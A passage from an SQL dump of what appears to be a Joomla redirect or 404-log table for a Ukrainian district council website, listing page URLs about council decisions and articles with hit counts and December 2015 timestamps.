00:00:00',301),(22891,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1257-pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki','','','',2,0,'2015-12-28 08:28:50','0000-00-00 00:00:00',301),(22892,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1259-pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki','','','',2,0,'2015-12-28 08:28:52','0000-00-00 00:00:00',301),(22893,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1259-pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-28 08:28:54','0000-00-00 00:00:00',301),(22894,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1261-pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki','','','',2,0,'2015-12-28 08:28:57','0000-00-00 00:00:00',301),(22895,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1282-pro-viznachennya-umov-oplati-pratsi-golovi-rajonnoji-radi-ta-zastupnika-golovi-rajonnoji-radi-na-2016-rik','','','',2,0,'2015-12-28 08:28:59','0000-00-00 00:00:00',301),(22896,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1287-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik','','','',2,0,'2015-12-28 08:29:02','0000-00-00 00:00:00',301),(22897,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1289-pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku','','','',2,0,'2015-12-28 08:29:09','0000-00-00 00:00:00',301),(22898,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1294-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',2,0,'2015-12-28 08:29:11','0000-00-00 00:00:00',301),(22899,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1294-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-12-28 08:29:17','0000-00-00 00:00:00',301),(22900,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-12-28 08:29:37','0000-00-00 00:00:00',301),(22901,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=617:-----l---28r-----&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 08:29:37','0000-00-00 00:00:00',301),(22902,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-12-28 08:29:39','0000-00-00 00:00:00',301),(22903,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-28 08:29:41','0000-00-00 00:00:00',301),(22904,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-28 08:29:43','0000-00-00 00:00:00',301),(22905,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-12-28 08:29:45','0000-00-00 00:00:00',301),(22906,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2015-12-28 08:29:46','0000-00-00 00:00:00',301),(22907,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-28 08:29:49','0000-00-00 00:00:00',301),(22908,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-28 08:29:50','0000-00-00 00:00:00',301),(22909,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-28 08:29:52','0000-00-00 00:00:00',301),(22910,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-12-28 08:29:54','0000-00-00 00:00:00',301),(22911,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-28 08:30:14','0000-00-00 00:00:00',301),(22912,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-28 08:30:17','0000-00-00 00:00:00',301),(22913,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1183:2014-01-28-09-18-31&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 08:30:22','0000-00-00 00:00:00',301),(22914,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=719:-lr&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 08:30:27','0000-00-00 00:00:00',301),(22915,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=566:6-2012-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 08:30:32','0000-00-00 00:00:00',301),(22916,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=411:-2014-&Itemid=72&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 08:30:36','0000-00-00 00:00:00',301),(22917,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-28 08:30:50','0000-00-00 00:00:00',301),(22918,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=933:-2013-2017-&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 08:31:08','0000-00-00 00:00:00',301),(22919,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-28 08:31:21','0000-00-00 00:00:00',301),(22920,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-28 08:31:23','0000-00-00 00:00:00',301),(22921,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-28 08:31:25','0000-00-00 00:00:00',301),(22922,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-28 08:31:26','0000-00-00 00:00:00',301),(22923,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:-21022013-&Itemid=86&lang=uk','','','',3,0,'2015-12-28 08:31:29','0000-00-00 00:00:00',301),(22924,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-28 08:33:16','0000-00-00 00:00:00',301),(22925,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7&Itemid=12&lang=en','','','',3,0,'2015-12-28 08:33:23','0000-00-00 00:00:00',301),(22926,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=9:2010-06-05-15-10-04&catid=7&Itemid=12&lang=uk','','','',3,0,'2015-12-28 08:33:25','0000-00-00 00:00:00',301),(22927,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=13&Itemid=33&lang=en','','','',3,0,'2015-12-28 08:33:30','0000-00-00 00:00:00',301),(22928,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=13&Itemid=33&lang=ru','','','',4,0,'2015-12-28 08:33:32','0000-00-00 00:00:00',301),(22929,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=31&Itemid=62&lang=en','','','',4,0,'2015-12-28 08:34:15','0000-00-00 00:00:00',301),(22930,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=en','','','',3,0,'2015-12-28 08:34:23','0000-00-00 00:00:00',301),(22931,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=33&Itemid=66&lang=ru','','','',3,0,'2015-12-28 08:34:25','0000-00-00 00:00:00',301),(22932,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=68&lang=en','','','',3,0,'2015-12-28 08:34:26','0000-00-00 00:00:00',301),(22933,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=69&lang=en','','','',3,0,'2015-12-28 08:34:31','0000-00-00 00:00:00',301),(22934,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=en','','','',3,0,'2015-12-28 08:34:35','0000-00-00 00:00:00',301),(22935,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=72&lang=ru','','','',3,0,'2015-12-28 08:34:37','0000-00-00 00:00:00',301),(22936,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=en','','','',3,0,'2015-12-28 08:34:38','0000-00-00 00:00:00',301),(22937,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=77&lang=ru','','','',5,0,'2015-12-28 08:34:46','0000-00-00 00:00:00',301),(22938,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=41&Itemid=78&lang=en','','','',5,0,'2015-12-28 08:34:47','0000-00-00 00:00:00',301),(22939,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=en','','','',3,0,'2015-12-28 08:34:53','0000-00-00 00:00:00',301),(22940,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=44&Itemid=83&lang=en','','','',4,0,'2015-12-28 08:34:58','0000-00-00 00:00:00',301),(22941,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=ru','','','',5,0,'2015-12-28 08:35:05','0000-00-00 00:00:00',301),(22942,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=ru','','','',4,0,'2015-12-28 08:35:08','0000-00-00 00:00:00',301),(22943,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=48&Itemid=87&lang=en','','','',3,0,'2015-12-28 08:35:10','0000-00-00 00:00:00',301),(22944,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=49&Itemid=88&lang=en','','','',3,0,'2015-12-28 08:35:13','0000-00-00 00:00:00',301),(22945,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=50&Itemid=90&lang=en','','','',3,0,'2015-12-28 08:35:16','0000-00-00 00:00:00',301),(22946,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=en','','','',3,0,'2015-12-28 08:35:19','0000-00-00 00:00:00',301),(22947,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=52&Itemid=93&lang=ru','','','',3,0,'2015-12-28 08:35:24','0000-00-00 00:00:00',301),(22948,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=en','','','',3,0,'2015-12-28 08:35:25','0000-00-00 00:00:00',301),(22949,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=en','','','',3,0,'2015-12-28 08:35:28','0000-00-00 00:00:00',301),(22950,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=54&Itemid=95&lang=ru','','','',3,0,'2015-12-28 08:35:30','0000-00-00 00:00:00',301),(22951,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=55&Itemid=96&lang=en','','','',3,0,'2015-12-28 08:35:31','0000-00-00 00:00:00',301),(22952,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=55&Itemid=96&lang=ru','','','',3,0,'2015-12-28 08:35:33','0000-00-00 00:00:00',301),(22953,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=57&Itemid=98&lang=en','','','',3,0,'2015-12-28 08:35:37','0000-00-00 00:00:00',301),(22954,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=57&Itemid=98&lang=ru','','','',3,0,'2015-12-28 08:35:39','0000-00-00 00:00:00',301),(22955,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=58&Itemid=105&lang=en','','','',3,0,'2015-12-28 08:35:40','0000-00-00 00:00:00',301),(22956,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=58&Itemid=105&lang=ru','','','',3,0,'2015-12-28 08:35:42','0000-00-00 00:00:00',301),(22957,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=en','','','',3,0,'2015-12-28 08:35:43','0000-00-00 00:00:00',301),(22958,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=ru','','','',3,0,'2015-12-28 08:35:45','0000-00-00 00:00:00',301),(22959,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 08:36:31','0000-00-00 00:00:00',301),(22960,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1098:2013-09-25-09-34-57&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 08:37:31','0000-00-00 00:00:00',301),(22961,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 08:37:37','0000-00-00 00:00:00',301),(22962,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 08:41:05','0000-00-00 00:00:00',301),(22963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=491:-2012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2015-12-28 08:47:27','0000-00-00 00:00:00',301),(22964,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=583:-l-lr&Itemid=77&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 08:53:13','0000-00-00 00:00:00',301),(22965,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 08:59:51','0000-00-00 00:00:00',301),(22966,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1090:-l-r-&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 08:59:59','0000-00-00 00:00:00',301),(22967,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=670:2012-05-08-05-15-51&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 09:00:07','0000-00-00 00:00:00',301),(22968,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1257:2014-03-29-18-03-31&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 09:07:34','0000-00-00 00:00:00',301),(22969,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=550:2012-01-26-12-39-51&Itemid=76&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 09:14:51','0000-00-00 00:00:00',301),(22970,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=733:-10-&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 09:17:37','0000-00-00 00:00:00',301),(22971,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=960:-19-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 09:18:36','0000-00-00 00:00:00',301),(22972,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1121:--24--6-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 09:20:06','0000-00-00 00:00:00',301),(22973,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 09:23:13','0000-00-00 00:00:00',301),(22974,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=507:2011-12-19-17-10-52&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 09:25:24','0000-00-00 00:00:00',301),(22975,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/60-deputatska-storinka/2010-06-05-12-52-17?lang=ru','','','',16,0,'2015-12-28 09:29:43','0000-00-00 00:00:00',301),(22976,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1257:2014-03-29-18-03-31&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 09:30:02','0000-00-00 00:00:00',301),(22977,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=463:----------------2007-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 09:30:35','0000-00-00 00:00:00',301),(22978,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1181:2014-01-22-06-06-13&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 09:30:51','0000-00-00 00:00:00',301),(22979,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=438:-----------l--r&Itemid=72&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 09:32:58','0000-00-00 00:00:00',301),(22980,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 09:36:46','0000-00-00 00:00:00',301),(22981,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 09:41:17','0000-00-00 00:00:00',301),(22982,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=541:2012-01-26-11-55-32&Itemid=76&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 09:47:45','0000-00-00 00:00:00',301),(22983,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 09:49:43','0000-00-00 00:00:00',301),(22984,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1034:2013-06-23-15-11-25&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 10:10:37','0000-00-00 00:00:00',301),(22985,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=327:2011-05-20-16-20-26&Itemid=66&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 10:10:47','0000-00-00 00:00:00',301),(22986,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=367:-1620-19072011-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 10:11:44','0000-00-00 00:00:00',301),(22987,'http://www.malyn-rayrada.org.ua/index.php?catid=13&id=13:2010-06-06-04-07-00&Itemid=33&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 10:13:00','0000-00-00 00:00:00',301),(22988,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=659:-2011-&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-28 10:13:10','0000-00-00 00:00:00',301),(22989,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1211:-2014-&Itemid=97&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 10:16:37','0000-00-00 00:00:00',301),(22990,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1274:----------------l--r&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-28 10:16:49','0000-00-00 00:00:00',301),(22991,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=549:-2010-2012-&Itemid=76&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 10:17:11','0000-00-00 00:00:00',301),(22992,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 10:19:47','0000-00-00 00:00:00',301),(22993,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 10:36:05','0000-00-00 00:00:00',301),(22994,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=737:2012-07-18-13-36-46&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 10:38:20','0000-00-00 00:00:00',301),(22995,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&lang=en&option=com_phocagallery&view=categories','','','',2,0,'2015-12-28 10:46:00','0000-00-00 00:00:00',301),(22996,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 10:46:46','0000-00-00 00:00:00',301),(22997,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=683:------------------------2012-&Itemid=80&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 10:46:56','0000-00-00 00:00:00',301),(22998,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=936:2013-02-21-09-43-43&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 10:50:13','0000-00-00 00:00:00',301),(22999,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=479:2011-11-28-07-33-14&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-12-28 11:18:25','0000-00-00 00:00:00',301),(23000,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=506:-lr&catid=38:--19122011-&Itemid=73&lang=ru','','','',1,0,'2015-12-28 12:30:08','0000-00-00 00:00:00',301),(23001,'http://www.malyn-rayrada.org.ua/index.php/816-golovne-upravlinnja-derzhzemagentstva-u?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 12:33:28','0000-00-00 00:00:00',301),(23002,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 13:05:49','0000-00-00 00:00:00',301),(23003,'http://malyn-rayrada.org.ua/index.php/1137-zustrich-iz-predstavnikami-teritorialnikh-gromad','','','',4,0,'2015-12-28 13:59:37','0000-00-00 00:00:00',301),(23004,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/img-7477-90','','','',6,0,'2015-12-28 13:59:47','0000-00-00 00:00:00',301),(23005,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/zabr3-147','','','',6,0,'2015-12-28 13:59:48','0000-00-00 00:00:00',301),(23006,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0821-3-96','','','',6,0,'2015-12-28 13:59:50','0000-00-00 00:00:00',301),(23007,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1274-pro-likvidatsiyu-lyubovitskoji-ta-shevchenkivskoji-zagalnoosvitnikh-shkil-i-ii-stupeniv','','','',9,0,'2015-12-28 14:00:32','0000-00-00 00:00:00',301),(23008,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1275-pro-pogodzhennya-zvilnennya-z-posadi-direktora-rajonnogo-budinku-kulturi-vishnevskoji-o-v','','','',10,0,'2015-12-28 14:00:33','0000-00-00 00:00:00',301),(23009,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1276-pro-pidviz-uchniv-shcho-prozhivayut-v-s-liplyani-ta-s-gutyanske-i-dojizhdzhayut-do-chopovitskogo-znvk-gimnaziya-dnz-znz-i-iii-stupeniv-i-dodomu-shkilnim-avtobusom','','','',8,0,'2015-12-28 14:00:35','0000-00-00 00:00:00',301),(23010,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1270-pro-zatverdzhennya-planu-diyalnosti-rajonnoji-radi-z-pidgotovki-proektiv-regulyatornikh-aktiv-na-2016-rik','','','',13,0,'2015-12-28 14:25:21','0000-00-00 00:00:00',301),(23011,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 17:02:18','0000-00-00 00:00:00',301),(23012,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1157:-----------11--2013-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 17:23:38','0000-00-00 00:00:00',301),(23013,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/bib4-131','','','',2,0,'2015-12-28 17:35:51','0000-00-00 00:00:00',301),(23014,'http://www.malyn-rayrada.org.ua/index.php?id=53&Itemid=94&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2015-12-28 17:55:14','0000-00-00 00:00:00',301),(23015,'http://www.malyn-rayrada.org.ua/index.php/259-vidznacheno-deputata-malinskoi-rajonnoi-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-28 18:01:10','0000-00-00 00:00:00',301),(23016,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=312:-2011-&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:13:41','0000-00-00 00:00:00',301),(23017,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=463:-2007-2015-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 18:14:56','0000-00-00 00:00:00',301),(23018,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=934:---------6---16112010-5---------------&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 18:16:34','0000-00-00 00:00:00',301),(23019,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=855:2012-12-12-14-22-20&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:24:58','0000-00-00 00:00:00',301),(23020,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=463:-2007-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:28:14','0000-00-00 00:00:00',301),(23021,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=430:14-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-28 18:31:15','0000-00-00 00:00:00',301),(23022,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=719:-lr&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-28 18:37:15','0000-00-00 00:00:00',301),(23023,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=733:-10-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-28 18:40:24','0000-00-00 00:00:00',301),(23024,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=762:-210-&lang=en&option=com_content&view=article','','','',1,0,'2015-12-28 18:45:35','0000-00-00 00:00:00',301),(23025,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-28 18:51:54','0000-00-00 00:00:00',301),(23026,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1179:2014-01-21-12-44-04&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-28 18:52:26','0000-00-00 00:00:00',301),(23027,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&catid=42&Itemid=80&lang=en','','','',1,0,'2015-12-28 18:52:52','0000-00-00 